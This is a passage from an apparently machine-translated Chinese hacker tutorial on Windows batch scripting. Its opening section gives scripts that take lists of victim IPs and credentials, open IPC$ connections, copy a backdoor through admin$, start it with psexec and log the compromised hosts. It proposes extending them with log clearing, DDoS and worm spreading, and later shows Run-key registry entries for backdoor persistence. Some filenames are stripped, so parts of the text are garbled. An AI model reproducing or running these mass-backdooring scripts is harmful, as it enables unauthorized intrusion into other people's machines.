sample3:
Have you ever had a lot of broilers waiting for you to grow the back door + *? , When there are a lot of people, the things that were originally very happy will become very depressed :). The article begins with the use of batch files that can simplify daily or repetitive tasks. So how to achieve it? Haha, you will understand after reading it.
There is only one main command: (When using the FOR command in the batch file, use %%variable for the specified variable)
@for /f "tokens=1,2,3 delims= " %%i in () do start call %%i %%j %%k
See sample1 above for usage of tokens, where it means passing the content in sequentially to the parameter %i %j %k.
It's nothing more than using the net use command to establish an IPC$ connection, copy the * + backdoor to victim, and then use the return code (If Errorlever =) to filter the host that successfully planted the backdoor, echo out, or echo to the specified file.
delims= The content in the representation is separated by a space. I think you must understand what the content here looks like when you see it. It should be arranged according to the objects represented by %%i %%j %%k, generally ip password username.
Code prototype:
--------------- cut here then save as a batchfile(I call it ) ---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in () do start call %%i %%j %%k
@goto end
:usage
@echo run this batch in dos just double-click it.
:end
--------------- cut here then save as a batchfile(I call it ) ---------------------------
------------------- cut here then save as a batchfile(I call it ) -----------------------------
@net use \\\\%1\\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy \\\\%1\\admin$\\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>
@psexec \\\\%1 c:\\winnt\\system32\\
@psexec \\\\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>
:failed
@echo Sorry can not connected to the victim
----------------- cut here then save as a batchfile(I call it ) --------------------------------
This is just the prototype of automatic backdoor batch processing. Two batches and backdoor programs () need to be placed in a unified directory. Batch content
It can also be expanded, for example: adding the function of clearing logs + DDOS, adding the function of adding users regularly, and making it more in-depth can have the automatic transmission function (worm). I won't describe it here, and friends who are interested can study it themselves.
2. How to use parameters in batch files
Parameters can be used in batch processing, generally from 1% to 9%. When there are multiple parameters, you need to use shift to move. This is rare, so we don’t consider it.
sample1:
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
This example is used to format several floppy disks continuously, so when using it, you need to enter a in the dos window. Haha, it seems to be a bit extra~^_^
sample2:
When we want to establish an IPC$ connection, we always have to enter a large number of commands. If we don’t do it well, we will type incorrectly. So we might as well write some fixed commands into a batch and assign the broiler ip password username to this batch in the same way as the parameters, so we don’t need to type commands every time.
@echo off
@net use \\\\1%\\ipc$ "2%" /u:"3%" Note, here PASSWORD is the second parameter.
@if errorlevel 1 echo connection failed
How about it, it is relatively simple to use the parameters? You are so handsome, you must have learned ^_^.No.3
3. How to use Compound Command
1.&
Usage: First Command & Second Command [& Third Command...]
This method can execute multiple commands at the same time regardless of whether the command is successfully executed.
Sample:
C:\\>dir z: & dir c:\\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\\Ex4rch
2002-05-14 23:51 <DIR> .
2002-05-14 23:51 <DIR> ..
2002-05-14 23:51 14
2.&&
Usage: First Command && Second Command [&& Third Command...]
This method can execute multiple commands at the same time. When an error occurs, the subsequent command will not be executed. If there is no error, all commands will be executed;
Sample:
C:\\>dir z: && dir c:\\Ex4rch
The system cannot find the path specified.
C:\\>dir c:\\Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\\Ex4rch
2002-05-14 23:55 <DIR> .
2002-05-14 23:55 <DIR> ..
2002-05-14 23:55 14
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.
This kind of command may be used when making backups, such as:
dir file://192.168.0.1/database/ && copy file://192.168.0.1/database/ E:\\backup
If a file exists on the remote server, execute the copy command. If the file does not exist, do not execute the copy command. This usage can replace IF exist :)
3.||
Usage: First Command || Second Command [|| Third Command...]
This method can execute multiple commands at the same time. When you encounter the correct command, the following commands will not be executed. If no correct commands appear, all commands will be executed all the time;
Sample:
C:\\Ex4rch>dir || del
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of C:\\Ex4rch
2002-05-14 23:55 14
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free
Examples of using combination commands:
sample:
@copy \\\\%1\\admin$\\system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>
4. Use of pipeline commands
1.| Command
Usage: First Command | Second Command [| Third Command...]
Use the result of the first command as a parameter of the second command. Remember that this method is very common in Unix.
sample:
time /t>>D:\\
netstat -n -p tcp|find ":3389">>D:\\
start Explorer
Did you see it? The terminal service allows us to customize the starting program for the user to enable the user to run the following bat to obtain the IP of the logged-in user.
2.>,>>Output redirect command
Redirecting the output results of a command or a program to a specific file. The difference between > and >> is that > will clear the content in the original file and write it to the specified file, while >> will only append the content to the specified file without changing the content.
sample1:
echo hello world>c:\\ (stupid example?)
sample2:
DLL *s are popular nowadays. We know that system32 is a good place to play hide-and-seek. Many *s have sharpened their heads and drilled there. DLL horses are no exception. For this point, we can record the EXE and DLL files in this directory after installing the system and necessary applications:
Run CMD--Convert directory to system32--dir *.exe> & dir *.dll>,
In this way, all the names of EXE and DLL files are recorded in the sum respectively.
If you find an exception in the future but cannot find the problem with traditional methods, you should consider whether the DLL * has been sneaked into the system.
At this time, we use the same command to record the EXE and DLL files under system32 to another sum, and then run:
CMD--fc > & fc >.(Use the FC command to compare the DLL and EXE files before and after, and enter the results into it), so that we can find some extra DLL and EXE files, and then by checking the creation time, version, whether it has been compressed, etc., it can be easier to determine whether it has been patronized by the DLL *. It is best not to have no. If there is any, don't just DEL. First use regsvr32/u to log out the backdoor DLL file, and then move it to the recycling bin. If the system does not have any abnormal response, delete it completely or submit it to the antivirus software company.
3.< 、>& 、<&
< Read command input from a file instead of from the keyboard.
>& Writes the output of one handle to the input of another handle.
<& Read input from one handle and write it to the output of another handle.
These are not commonly used, so I won't introduce them much.
No.5
5. How to use batch files to operate the registry
During the intrusion process, the specific key values in the registry are often returned to achieve certain purposes, such as: to hide the backdoor and * program, delete the remaining key values under Run. Or create a service to load the backdoor. Of course, we will also modify the registry to strengthen the system or change a certain attribute of the system. These require us to have a certain understanding of registry operations. Let’s first learn how to use .REG files to operate the registry. (We can use batch processing to generate a REG file)
Regarding the operations of the registry, common things are creation, modification, and deletion.
1. Create
Create in two types, one is to create subkey (Subkey)
We create a file with the following content:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\hacker]
Then execute the script and you have created a child under HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft with the name "hacker".
Another way is to create a project name
Then this file format is a typical file format, which is the same as the file format you exported from the registry, and the content is as follows:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]
"Invader"="Ex4rch"
"Door"=C:\\\\WINNT\\\\system32\\\\
"Autodos"=dword:02
This is under [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]
Created three new projects: Invader, door, and about
The type of Invader is "String Value"
The type of door is "REG SZ Value"
The type of Autodos is "DWORD Value"
2. Modify
Modification is relatively simple. Just export the project you need to modify, then modify it with Notepad, and then import (regedit/s).
3. Delete
Let’s first talk about deleting a project name. We create a file like this:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]
"Ex4rch"=-
When the script is executed, the "Ex4rch" under [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run] will be deleted;
Previous page12Read the full text